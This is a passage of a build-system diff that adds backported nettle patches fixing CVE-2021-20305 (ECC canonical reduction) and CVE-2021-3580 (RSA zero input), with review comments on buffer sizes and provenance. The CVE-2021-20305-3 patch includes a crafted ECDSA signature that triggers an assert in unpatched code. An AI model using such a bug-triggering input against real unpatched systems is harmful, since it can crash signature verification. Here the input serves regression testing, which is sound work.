+ #define ecc_mod _nettle_ecc_mod
+ #define ecc_mod_inv _nettle_ecc_mod_inv
+@@ -263,6 +265,19 @@ ecc_mod_sqr (const struct ecc_modulo *m,
+ #define ecc_modq_mul(ecc, r, a, b) \
+ ecc_mod_mul (&(ecc)->q, (r), (a), (b))
+
++/* These mul and sqr functions produce a canonical result, 0 <= R < M.
++ Requirements on input and output areas are similar to the above
++ functions, except that it is *not* allowed to pass rp = rp +
++ m->size.
++ */
++void
++ecc_mod_mul_canonical (const struct ecc_modulo *m, mp_limb_t *rp,
++ const mp_limb_t *ap, const mp_limb_t *bp, mp_limb_t *tp);
++
++void
++ecc_mod_sqr_canonical (const struct ecc_modulo *m, mp_limb_t *rp,
++ const mp_limb_t *ap, mp_limb_t *tp);
++
+ /* mod q operations. */
+ void
+ ecc_mod_random (const struct ecc_modulo *m, mp_limb_t *xp,
+Index: nettle-3.5.1/ecc-j-to-a.c
+===================================================================
+--- nettle-3.5.1.orig/ecc-j-to-a.c
++++ nettle-3.5.1/ecc-j-to-a.c
+@@ -51,8 +51,6 @@ ecc_j_to_a (const struct ecc_curve *ecc,
+ #define izBp (scratch + 3*ecc->p.size)
+ #define tp scratch
+
+- mp_limb_t cy;
+-
+ if (ecc->use_redc)
+ {
+ /* Set v = (r_z / B^2)^-1,
+@@ -86,17 +84,14 @@ ecc_j_to_a (const struct ecc_curve *ecc,
+ ecc_modp_sqr (ecc, iz2p, izp);
+ }
+
+- ecc_modp_mul (ecc, iz3p, iz2p, p);
+- /* ecc_modp (and ecc_modp_mul) may return a value up to 2p - 1, so
+- do a conditional subtraction. */
+- cy = mpn_sub_n (r, iz3p, ecc->p.m, ecc->p.size);
+- cnd_copy (cy, r, iz3p, ecc->p.size);
++ ecc_mod_mul_canonical (&ecc->p, r, iz2p, p, iz3p);
+
+ if (op)
+ {
+ /* Skip y coordinate */
+ if (op > 1)
+ {
++ mp_limb_t cy;
+ /* Also reduce the x coordinate mod ecc->q. It should
+ already be < 2*ecc->q, so one subtraction should
+ suffice. */
+@@ -106,10 +101,7 @@ ecc_j_to_a (const struct ecc_curve *ecc,
+ return;
+ }
+ ecc_modp_mul (ecc, iz3p, iz2p, izp);
+- ecc_modp_mul (ecc, tp, iz3p, p + ecc->p.size);
+- /* And a similar subtraction. */
+- cy = mpn_sub_n (r + ecc->p.size, tp, ecc->p.m, ecc->p.size);
+- cnd_copy (cy, r + ecc->p.size, tp, ecc->p.size);
++ ecc_mod_mul_canonical (&ecc->p, r + ecc->p.size, iz3p, p + ecc->p.size, iz3p);
+
+ #undef izp
+ #undef up
+Index: nettle-3.5.1/ecc-mod-arith.c
+===================================================================
+--- nettle-3.5.1.orig/ecc-mod-arith.c
++++ nettle-3.5.1/ecc-mod-arith.c
+@@ -119,6 +119,30 @@ ecc_mod_mul (const struct ecc_modulo *m,
+ }
+
+ void
++ecc_mod_mul_canonical (const struct ecc_modulo *m, mp_limb_t *rp,
++ const mp_limb_t *ap, const mp_limb_t *bp, mp_limb_t *tp)
++{
++ mp_limb_t cy;
++ mpn_mul_n (tp + m->size, ap, bp, m->size);
++ m->reduce (m, tp + m->size);
++
++ cy = mpn_sub_n (rp, tp + m->size, m->m, m->size);
++ cnd_copy (cy, rp, tp + m->size, m->size);
++}
++
++void
++ecc_mod_sqr_canonical (const struct ecc_modulo *m, mp_limb_t *rp,
++ const mp_limb_t *ap, mp_limb_t *tp)
++{
++ mp_limb_t cy;
++ mpn_sqr (tp + m->size, ap, m->size);
++ m->reduce (m, tp + m->size);
++
++ cy = mpn_sub_n (rp, tp + m->size, m->m, m->size);
++ cnd_copy (cy, rp, tp + m->size, m->size);
++}
++
++void
+ ecc_mod_sqr (const struct ecc_modulo *m, mp_limb_t *rp,
+ const mp_limb_t *ap)
+ {
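Review bot: Every call site converted to `ecc_mod_mul_canonical` now needs its `tp` argument to cover 3*m->size limbs, because the new helper in ecc-mod-arith.c writes the double-width product at `tp + m->size` instead of at the result pointer, and the ecc-internal.h hunks shown add only the new names and prototypes. In ecc-j-to-a.c both calls pass `iz3p` as `tp`, and in CVE-2021-20305-2.patch `equal_h` passes `t1` (`scratch + p->size`), so that call reaches `scratch + 4*p->size`; the ecdsa call sites in -3 and -4 follow the same pattern. The scratch allocations lie outside these hunks, so they should be checked against the 3.5.1 tree rather than assumed from the newer release the fix was written for. I would record the result in the patch header, e.g. `[Scratch sizes of all converted call sites checked against nettle 3.5.1]`.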
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch
new file mode 100644
index 0000000000..bb56b14c8c
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch
@@ -0,0 +1,53 @@
+Backport of:
+
+From 971bed6ab4b27014eb23085e8176917e1a096fd5 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Sat, 13 Mar 2021 17:26:37 +0100
+Subject: [PATCH] Use ecc_mod_mul_canonical for point comparison.
+
+* eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical.
+
+(cherry picked from commit 5b7608fde3a6d2ab82bffb35db1e4e330927c906)
+
+Upstream-Status: Backport
+https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-2.patch
+CVE: CVE-2021-20305 dep2
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog | 4 ++++
+ eddsa-verify.c | 9 ++-------
+ 2 files changed, 6 insertions(+), 7 deletions(-)
+
+#diff --git a/ChangeLog b/ChangeLog
+#index 5cc5c188..2a9217a6 100644
+#--- a/ChangeLog
+#+++ b/ChangeLog
+#@@ -1,3 +1,7 @@
+#+2021-03-13 Niels Möller <nisse@lysator.liu.se>
+#+
+#+ * eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical.
+#+
+# 2021-03-11 Niels Möller <nisse@lysator.liu.se>
+#
+# * ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical):
+Index: nettle-3.5.1/eddsa-verify.c
+===================================================================
+--- nettle-3.5.1.orig/eddsa-verify.c
++++ nettle-3.5.1/eddsa-verify.c
+@@ -53,13 +53,8 @@ equal_h (const struct ecc_modulo *p,
+ #define t0 scratch
+ #define t1 (scratch + p->size)
+
+- ecc_mod_mul (p, t0, x1, z2);
+- if (mpn_cmp (t0, p->m, p->size) >= 0)
+- mpn_sub_n (t0, t0, p->m, p->size);
+-
+- ecc_mod_mul (p, t1, x2, z1);
+- if (mpn_cmp (t1, p->m, p->size) >= 0)
+- mpn_sub_n (t1, t1, p->m, p->size);
++ ecc_mod_mul_canonical (p, t0, x1, z2, t0);
++ ecc_mod_mul_canonical (p, t1, x2, z1, t1);
+
+ return mpn_cmp (t0, t1, p->size) == 0;
+
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch
new file mode 100644
index 0000000000..15a892ecdf
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch
@@ -0,0 +1,122 @@
+Backport of:
+
+From 74ee0e82b6891e090f20723750faeb19064e31b2 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Sat, 13 Mar 2021 15:19:19 +0100
+Subject: [PATCH] Fix bug in ecc_ecdsa_verify.
+
+* ecc-ecdsa-verify.c (ecc_ecdsa_verify): Use ecc_mod_mul_canonical
+to compute the scalars used for ecc multiplication.
+* testsuite/ecdsa-verify-test.c (test_main): Add test case that
+triggers an assert on 64-bit platforms, without above fix.
+* testsuite/ecdsa-sign-test.c (test_main): Test case generating
+the same signature.
+
+(cherry picked from commit 2397757b3f95fcae1e2d3011bf99ca5b5438378f)
+
+Upstream-Status: Backport
+https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-3.patch
+CVE: CVE-2021-20305 dep3
+[Minor fixup on _nettle_secp_224r1]
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog | 10 +++++++++-
+ ecc-ecdsa-verify.c | 4 ++--
+ testsuite/ecdsa-sign-test.c | 13 +++++++++++++
+ testsuite/ecdsa-verify-test.c | 20 ++++++++++++++++++++
+ 4 files changed, 44 insertions(+), 3 deletions(-)
+
+#diff --git a/ChangeLog b/ChangeLog
+#index 2a9217a6..63848f53 100644
+#--- a/ChangeLog
+#+++ b/ChangeLog
+#@@ -1,7 +1,15 @@
+# 2021-03-13 Niels Möller <nisse@lysator.liu.se>
+#
+#- * eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical.
+#+ * ecc-ecdsa-verify.c (ecc_ecdsa_verify): Use ecc_mod_mul_canonical
+#+ to compute the scalars used for ecc multiplication.
+#+ * testsuite/ecdsa-verify-test.c (test_main): Add test case that
+#+ triggers an assert on 64-bit platforms, without above fix.
+#+ * testsuite/ecdsa-sign-test.c (test_main): Test case generating
+#+ the same signature.
+#+
+#+2021-03-13 Niels Möller <nisse@lysator.liu.se>
+#
+#+ * eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical.
+# 2021-03-11 Niels Möller <nisse@lysator.liu.se>
+#
+# * ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical):
+Index: nettle-3.5.1/ecc-ecdsa-verify.c
+===================================================================
+--- nettle-3.5.1.orig/ecc-ecdsa-verify.c
++++ nettle-3.5.1/ecc-ecdsa-verify.c
+@@ -112,10 +112,10 @@ ecc_ecdsa_verify (const struct ecc_curve
+
+ /* u1 = h / s, P1 = u1 * G */
+ ecc_hash (&ecc->q, hp, length, digest);
+- ecc_modq_mul (ecc, u1, hp, sinv);
++ ecc_mod_mul_canonical (&ecc->q, u1, hp, sinv, u1);
+
+ /* u2 = r / s, P2 = u2 * Y */
+- ecc_modq_mul (ecc, u2, rp, sinv);
++ ecc_mod_mul_canonical (&ecc->q, u2, rp, sinv, u2);
+
+ /* Total storage: 5*ecc->p.size + ecc->mul_itch */
+ ecc->mul (ecc, P2, u2, pp, u2 + ecc->p.size);
+Index: nettle-3.5.1/testsuite/ecdsa-sign-test.c
+===================================================================
+--- nettle-3.5.1.orig/testsuite/ecdsa-sign-test.c
++++ nettle-3.5.1/testsuite/ecdsa-sign-test.c
+@@ -58,6 +58,19 @@ test_ecdsa (const struct ecc_curve *ecc,
+ void
+ test_main (void)
+ {
++ /* Producing the signature for corresponding test in
++ ecdsa-verify-test.c, with special u1 and u2. */
++ test_ecdsa (&_nettle_secp_224r1,
++ "99b5b787484def12894ca507058b3bf5"
++ "43d72d82fa7721d2e805e5e6",
++ "2",
++ SHEX("cdb887ac805a3b42e22d224c85482053"
++ "16c755d4a736bb2032c92553"),
++ "706a46dc76dcb76798e60e6d89474788"
++ "d16dc18032d268fd1a704fa6", /* r */
++ "3a41e1423b1853e8aa89747b1f987364"
++ "44705d6d6d8371ea1f578f2e"); /* s */
++
+ /* Test cases for the smaller groups, verified with a
+ proof-of-concept implementation done for Yubico AB. */
+ test_ecdsa (&_nettle_secp_192r1,
+Index: nettle-3.5.1/testsuite/ecdsa-verify-test.c
+===================================================================
+--- nettle-3.5.1.orig/testsuite/ecdsa-verify-test.c
++++ nettle-3.5.1/testsuite/ecdsa-verify-test.c
+@@ -81,6 +81,26 @@ test_ecdsa (const struct ecc_curve *ecc,
+ void
+ test_main (void)
+ {
++ /* Corresponds to nonce k = 2 and private key z =
++ 0x99b5b787484def12894ca507058b3bf543d72d82fa7721d2e805e5e6. z and
++ hash are chosen so that intermediate scalars in the verify
++ equations are u1 = 0x6b245680e700, u2 =
++ 259da6542d4ba7d21ad916c3bd57f811. These values require canonical
++ reduction of the scalars. Bug caused by missing canonical
++ reduction reported by Guido Vranken. */
++ test_ecdsa (&_nettle_secp_224r1,
++ "9e7e6cc6b1bdfa8ee039b66ad85e5490"
++ "7be706a900a3cba1c8fdd014", /* x */
++ "74855db3f7c1b4097ae095745fc915e3"
++ "8a79d2a1de28f282eafb22ba", /* y */
++
++ SHEX("cdb887ac805a3b42e22d224c85482053"
++ "16c755d4a736bb2032c92553"),
++ "706a46dc76dcb76798e60e6d89474788"
++ "d16dc18032d268fd1a704fa6", /* r */
++ "3a41e1423b1853e8aa89747b1f987364"
++ "44705d6d6d8371ea1f578f2e"); /* s */
++
+ /* From RFC 4754 */
+ test_ecdsa (&_nettle_secp_256r1,
+ "2442A5CC 0ECD015F A3CA31DC 8E2BBC70"
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch
new file mode 100644
index 0000000000..54b4fa584c
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch
@@ -0,0 +1,48 @@
+Backport of:
+
+From 51f643eee00e2caa65c8a2f5857f49acdf3ef1ce Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Sat, 13 Mar 2021 16:27:50 +0100
+Subject: [PATCH] Ensure ecdsa_sign output is canonically reduced.
+
+* ecc-ecdsa-sign.c (ecc_ecdsa_sign): Ensure s output is reduced to
+canonical range.
+
+(cherry picked from commit c24b36160dc5303f7541dd9da1429c4046f27398)
+
+Upstream-Status: Backport
+https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-4.patch
+CVE: CVE-2021-20305 dep4
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog | 3 +++
+ ecc-ecdsa-sign.c | 3 +--
+ 2 files changed, 4 insertions(+), 2 deletions(-)
+
+#diff --git a/ChangeLog b/ChangeLog
+#index 63848f53..fb2d7f66 100644
+#--- a/ChangeLog
+#+++ b/ChangeLog
+#@@ -1,5 +1,8 @@
+# 2021-03-13 Niels Möller <nisse@lysator.liu.se>
+#
+#+ * ecc-ecdsa-sign.c (ecc_ecdsa_sign): Ensure s output is reduced to
+#+ canonical range.
+#+
+# * ecc-ecdsa-verify.c (ecc_ecdsa_verify): Use ecc_mod_mul_canonical
+# to compute the scalars used for ecc multiplication.
+# * testsuite/ecdsa-verify-test.c (test_main): Add test case that
+--- a/ecc-ecdsa-sign.c
++++ b/ecc-ecdsa-sign.c
+@@ -90,9 +90,8 @@ ecc_ecdsa_sign (const struct ecc_curve *
+
+ ecc_modq_mul (ecc, tp, zp, rp);
+ ecc_modq_add (ecc, hp, hp, tp);
+- ecc_modq_mul (ecc, tp, hp, kinv);
++ ecc_mod_mul_canonical (&ecc->q, sp, hp, kinv, tp);
+
+- mpn_copyi (sp, tp, ecc->p.size);
+ #undef P
+ #undef hp
+ #undef kinv
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch
new file mode 100644
index 0000000000..468ff66266
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch
@@ -0,0 +1,53 @@
+Backport of:
+
+From ae3801a0e5cce276c270973214385c86048d5f7b Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Sat, 13 Mar 2021 16:42:21 +0100
+Subject: [PATCH] Similar fix for eddsa.
+
+* eddsa-hash.c (_eddsa_hash): Ensure result is canonically
+reduced. Two of the three call sites need that.
+
+(cherry picked from commit d9b564e4b3b3a5691afb9328c7342b3f7ca64288)
+
+
+Upstream-Status: Backport
+https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-6.patch
+CVE: CVE-2021-20305
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog | 3 +++
+ eddsa-hash.c | 10 +++++++---
+ 2 files changed, 10 insertions(+), 3 deletions(-)
+
+#diff --git a/ChangeLog b/ChangeLog
+#index 5f8a22c2..ce330831 100644
+#--- a/ChangeLog
+#+++ b/ChangeLog
+#@@ -1,5 +1,8 @@
+# 2021-03-13 Niels Möller <nisse@lysator.liu.se>
+#
+#+ * eddsa-hash.c (_eddsa_hash): Ensure result is canonically
+#+ reduced. Two of the three call sites need that.
+#+
+# * ecc-gostdsa-verify.c (ecc_gostdsa_verify): Use ecc_mod_mul_canonical
+# to compute the scalars used for ecc multiplication.
+#
+Index: nettle-3.5.1/eddsa-hash.c
+===================================================================
+--- nettle-3.5.1.orig/eddsa-hash.c
++++ nettle-3.5.1/eddsa-hash.c
+@@ -46,7 +46,12 @@ void
+ _eddsa_hash (const struct ecc_modulo *m,
+ mp_limb_t *rp, const uint8_t *digest)
+ {
++ mp_limb_t cy;
+ size_t nbytes = 1 + m->bit_size / 8;
+ mpn_set_base256_le (rp, 2*m->size, digest, 2*nbytes);
+ m->mod (m, rp);
++ mpn_copyi (rp + m->size, rp, m->size);
++ /* Ensure canonical reduction. */
++ cy = mpn_sub_n (rp, rp + m->size, m->m, m->size);
++ cnd_copy (cy, rp, rp + m->size, m->size);
+ }
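Review bot: The provenance URL in this header points at Debian's `CVE-2021-20305-6.patch` while the file is added as `CVE-2021-20305-5.patch`, so a later audit cannot tell whether one step of the series was dropped on purpose. The commented-out ChangeLog context mentions `ecc-gostdsa-verify.c`, which suggests the skipped step is a GOST DSA fix for code that presumably is not part of 3.5.1; that is inferred, not visible here. I would say so in the header, for example `[Debian patch 5 of the series is not carried: <reason>]`, next to the URL.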
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch
new file mode 100644
index 0000000000..ac3a638e72
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch
@@ -0,0 +1,277 @@
+From cd6059aebdd3059fbcf674dddb850b821c13b6c2 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Tue, 8 Jun 2021 21:31:39 +0200
+Subject: [PATCH 1/2] Change _rsa_sec_compute_root_tr to take a fix input size.
+
+Improves consistency with _rsa_sec_compute_root, and fixes zero-input bug.
+
+(cherry picked from commit 485b5e2820a057e873b1ba812fdb39cae4adf98c)
+
+Upstream-Status: Backport
+CVE: CVE-2021-3580 dep#1
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog | 17 +++++++++-
+ rsa-decrypt-tr.c | 7 ++---
+ rsa-internal.h | 4 +--
+ rsa-sec-decrypt.c | 9 ++++--
+ rsa-sign-tr.c | 61 +++++++++++++++++-------------------
+ testsuite/rsa-encrypt-test.c | 14 ++++++++-
+ 6 files changed, 69 insertions(+), 43 deletions(-)
+
+Index: nettle-3.5.1/rsa-decrypt-tr.c
+===================================================================
+--- nettle-3.5.1.orig/rsa-decrypt-tr.c
++++ nettle-3.5.1/rsa-decrypt-tr.c
+@@ -52,14 +52,13 @@ rsa_decrypt_tr(const struct rsa_public_k
+ mp_size_t key_limb_size;
+ int res;
+
+- key_limb_size = NETTLE_OCTET_SIZE_TO_LIMB_SIZE(key->size);
++ key_limb_size = mpz_size(pub->n);
+
+ TMP_GMP_ALLOC (m, key_limb_size);
+ TMP_GMP_ALLOC (em, key->size);
++ mpz_limbs_copy(m, gibberish, key_limb_size);
+
+- res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m,
+- mpz_limbs_read(gibberish),
+- mpz_size(gibberish));
++ res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m, m);
+
+ mpn_get_base256 (em, key->size, m, key_limb_size);
+
+Index: nettle-3.5.1/rsa-internal.h
+===================================================================
+--- nettle-3.5.1.orig/rsa-internal.h
++++ nettle-3.5.1/rsa-internal.h
+@@ -78,11 +78,11 @@ _rsa_sec_compute_root(const struct rsa_p
+ mp_limb_t *scratch);
+
+ /* Safe side-channel silent variant, using RSA blinding, and checking the
+- * result after CRT. */
++ * result after CRT. In-place calls, with x == m, is allowed. */
+ int
+ _rsa_sec_compute_root_tr(const struct rsa_public_key *pub,
+ const struct rsa_private_key *key,
+ void *random_ctx, nettle_random_func *random,
+- mp_limb_t *x, const mp_limb_t *m, size_t mn);
++ mp_limb_t *x, const mp_limb_t *m);
+
+ #endif /* NETTLE_RSA_INTERNAL_H_INCLUDED */
+Index: nettle-3.5.1/rsa-sec-decrypt.c
+===================================================================
+--- nettle-3.5.1.orig/rsa-sec-decrypt.c
++++ nettle-3.5.1/rsa-sec-decrypt.c
+@@ -58,9 +58,12 @@ rsa_sec_decrypt(const struct rsa_public_
+ TMP_GMP_ALLOC (m, mpz_size(pub->n));
+ TMP_GMP_ALLOC (em, key->size);
+
+- res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m,
+- mpz_limbs_read(gibberish),
+- mpz_size(gibberish));
++ /* We need a copy because m can be shorter than key_size,
++ * but _rsa_sec_compute_root_tr expect all inputs to be
++ * normalized to a key_size long buffer length */
++ mpz_limbs_copy(m, gibberish, mpz_size(pub->n));
++
++ res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m, m);
+
+ mpn_get_base256 (em, key->size, m, mpz_size(pub->n));
+
+Index: nettle-3.5.1/rsa-sign-tr.c
+===================================================================
+--- nettle-3.5.1.orig/rsa-sign-tr.c
++++ nettle-3.5.1/rsa-sign-tr.c
+@@ -131,35 +131,34 @@ int
+ _rsa_sec_compute_root_tr(const struct rsa_public_key *pub,
+ const struct rsa_private_key *key,
+ void *random_ctx, nettle_random_func *random,
+- mp_limb_t *x, const mp_limb_t *m, size_t mn)
++ mp_limb_t *x, const mp_limb_t *m)
+ {
++ mp_size_t nn;
+ mpz_t mz;
+ mpz_t xz;
+ int res;
+
+- mpz_init(mz);
+ mpz_init(xz);
+
+- mpn_copyi(mpz_limbs_write(mz, mn), m, mn);
+- mpz_limbs_finish(mz, mn);
++ nn = mpz_size (pub->n);
+
+- res = rsa_compute_root_tr(pub, key, random_ctx, random, xz, mz);
++ res = rsa_compute_root_tr(pub, key, random_ctx, random, xz,
++ mpz_roinit_n(mz, m, nn));
+
+ if (res)
+- mpz_limbs_copy(x, xz, mpz_size(pub->n));
++ mpz_limbs_copy(x, xz, nn);
+
+- mpz_clear(mz);
+ mpz_clear(xz);
+ return res;
+ }
+ #else
+ /* Blinds m, by computing c = m r^e (mod n), for a random r. Also
+- returns the inverse (ri), for use by rsa_unblind. */
++ returns the inverse (ri), for use by rsa_unblind. Must have c != m,
++ no in-place operation.*/
+ static void
+ rsa_sec_blind (const struct rsa_public_key *pub,
+ void *random_ctx, nettle_random_func *random,
+- mp_limb_t *c, mp_limb_t *ri, const mp_limb_t *m,
+- mp_size_t mn)
++ mp_limb_t *c, mp_limb_t *ri, const mp_limb_t *m)
+ {
+ const mp_limb_t *ep = mpz_limbs_read (pub->e);
+ const mp_limb_t *np = mpz_limbs_read (pub->n);
+@@ -177,15 +176,15 @@ rsa_sec_blind (const struct rsa_public_k
+
+ /* c = m*(r^e) mod n */
+ itch = mpn_sec_powm_itch(nn, ebn, nn);
+- i2 = mpn_sec_mul_itch(nn, mn);
++ i2 = mpn_sec_mul_itch(nn, nn);
+ itch = MAX(itch, i2);
+- i2 = mpn_sec_div_r_itch(nn + mn, nn);
++ i2 = mpn_sec_div_r_itch(2*nn, nn);
+ itch = MAX(itch, i2);
+ i2 = mpn_sec_invert_itch(nn);
+ itch = MAX(itch, i2);
+
+- TMP_GMP_ALLOC (tp, nn + mn + itch);
+- scratch = tp + nn + mn;
++ TMP_GMP_ALLOC (tp, 2*nn + itch);
++ scratch = tp + 2*nn;
+
+ /* ri = r^(-1) */
+ do
+@@ -198,9 +197,8 @@ rsa_sec_blind (const struct rsa_public_k
+ while (!mpn_sec_invert (ri, tp, np, nn, 2 * nn * GMP_NUMB_BITS, scratch));
+
+ mpn_sec_powm (c, rp, nn, ep, ebn, np, nn, scratch);
+- /* normally mn == nn, but m can be smaller in some cases */
+- mpn_sec_mul (tp, c, nn, m, mn, scratch);
+- mpn_sec_div_r (tp, nn + mn, np, nn, scratch);
++ mpn_sec_mul (tp, c, nn, m, nn, scratch);
++ mpn_sec_div_r (tp, 2*nn, np, nn, scratch);
+ mpn_copyi(c, tp, nn);
+
+ TMP_GMP_FREE (r);
+@@ -208,7 +206,7 @@ rsa_sec_blind (const struct rsa_public_k
+ TMP_GMP_FREE (tp);
+ }
+
+-/* m = c ri mod n */
++/* m = c ri mod n. Allows x == c. */
+ static void
+ rsa_sec_unblind (const struct rsa_public_key *pub,
+ mp_limb_t *x, mp_limb_t *ri, const mp_limb_t *c)
+@@ -299,7 +297,7 @@ int
+ _rsa_sec_compute_root_tr(const struct rsa_public_key *pub,
+ const struct rsa_private_key *key,
+ void *random_ctx, nettle_random_func *random,
+- mp_limb_t *x, const mp_limb_t *m, size_t mn)
++ mp_limb_t *x, const mp_limb_t *m)
+ {
+ TMP_GMP_DECL (c, mp_limb_t);
+ TMP_GMP_DECL (ri, mp_limb_t);
+@@ -307,7 +305,7 @@ _rsa_sec_compute_root_tr(const struct rs
+ size_t key_limb_size;
+ int ret;
+
+- key_limb_size = NETTLE_OCTET_SIZE_TO_LIMB_SIZE(key->size);
++ key_limb_size = mpz_size(pub->n);
+
+ /* mpz_powm_sec handles only odd moduli. If p, q or n is even, the
+ key is invalid and rejected by rsa_private_key_prepare. However,
+@@ -321,19 +319,18 @@ _rsa_sec_compute_root_tr(const struct rs
+ }
+
+ assert(mpz_size(pub->n) == key_limb_size);
+- assert(mn <= key_limb_size);
+
+ TMP_GMP_ALLOC (c, key_limb_size);
+ TMP_GMP_ALLOC (ri, key_limb_size);
+ TMP_GMP_ALLOC (scratch, _rsa_sec_compute_root_itch(key));
+
+- rsa_sec_blind (pub, random_ctx, random, x, ri, m, mn);
++ rsa_sec_blind (pub, random_ctx, random, c, ri, m);
+
+- _rsa_sec_compute_root(key, c, x, scratch);
++ _rsa_sec_compute_root(key, x, c, scratch);
+
+- ret = rsa_sec_check_root(pub, c, x);
++ ret = rsa_sec_check_root(pub, x, c);
+
+- rsa_sec_unblind(pub, x, ri, c);
++ rsa_sec_unblind(pub, x, ri, x);
+
+ cnd_mpn_zero(1 - ret, x, key_limb_size);
+
+@@ -357,17 +354,17 @@ rsa_compute_root_tr(const struct rsa_pub
+ mpz_t x, const mpz_t m)
+ {
+ TMP_GMP_DECL (l, mp_limb_t);
++ mp_size_t nn = mpz_size(pub->n);
+ int res;
+
+- mp_size_t l_size = NETTLE_OCTET_SIZE_TO_LIMB_SIZE(key->size);
+- TMP_GMP_ALLOC (l, l_size);
++ TMP_GMP_ALLOC (l, nn);
++ mpz_limbs_copy(l, m, nn);
+
+- res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, l,
+- mpz_limbs_read(m), mpz_size(m));
++ res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, l, l);
+ if (res) {
+- mp_limb_t *xp = mpz_limbs_write (x, l_size);
+- mpn_copyi (xp, l, l_size);
+- mpz_limbs_finish (x, l_size);
++ mp_limb_t *xp = mpz_limbs_write (x, nn);
++ mpn_copyi (xp, l, nn);
++ mpz_limbs_finish (x, nn);
+ }
+
+ TMP_GMP_FREE (l);
+Index: nettle-3.5.1/testsuite/rsa-encrypt-test.c
+===================================================================
+--- nettle-3.5.1.orig/testsuite/rsa-encrypt-test.c
++++ nettle-3.5.1/testsuite/rsa-encrypt-test.c
+@@ -19,6 +19,7 @@ test_main(void)
+ uint8_t after;
+
+ mpz_t gibberish;
++ mpz_t zero;
+
+ rsa_private_key_init(&key);
+ rsa_public_key_init(&pub);
+@@ -101,6 +102,17 @@ test_main(void)
+ ASSERT(decrypted[decrypted_length] == after);
+ ASSERT(decrypted[0] == 'A');
+
++ /* Test zero input. */
++ mpz_init_set_ui (zero, 0);
++ decrypted_length = msg_length;
++ ASSERT(!rsa_decrypt(&key, &decrypted_length, decrypted, zero));
++ ASSERT(!rsa_decrypt_tr(&pub, &key,
++ &lfib, (nettle_random_func *) knuth_lfib_random,
++ &decrypted_length, decrypted, zero));
++ ASSERT(!rsa_sec_decrypt(&pub, &key,
++ &lfib, (nettle_random_func *) knuth_lfib_random,
++ decrypted_length, decrypted, zero));
++ ASSERT(decrypted_length == msg_length);
+
+ /* Test invalid key. */
+ mpz_add_ui (key.q, key.q, 2);
+@@ -112,6 +124,6 @@ test_main(void)
+ rsa_private_key_clear(&key);
+ rsa_public_key_clear(&pub);
+ mpz_clear(gibberish);
++ mpz_clear(zero);
+ free(decrypted);
+ }
+-
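Review bot: In the second `_rsa_sec_compute_root_tr` (the `#else` branch of rsa-sign-tr.c), the context line `assert(mpz_size(pub->n) == key_limb_size);` becomes a tautology once `key_limb_size` is set from `mpz_size(pub->n)`. Before this change it compared the public modulus with the limb count derived from `key->size`, while `c`, `ri` and `x` are now sized from the public key alone and still handed to `_rsa_sec_compute_root(key, x, c, scratch)`. If the cross-check between the two keys is still wanted, it would read `assert(key_limb_size == NETTLE_OCTET_SIZE_TO_LIMB_SIZE(key->size));`. Since this is a verbatim backport, that change belongs upstream first. The function body extends beyond the hunks shown.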
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch
new file mode 100644
index 0000000000..18e952ddf7
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch
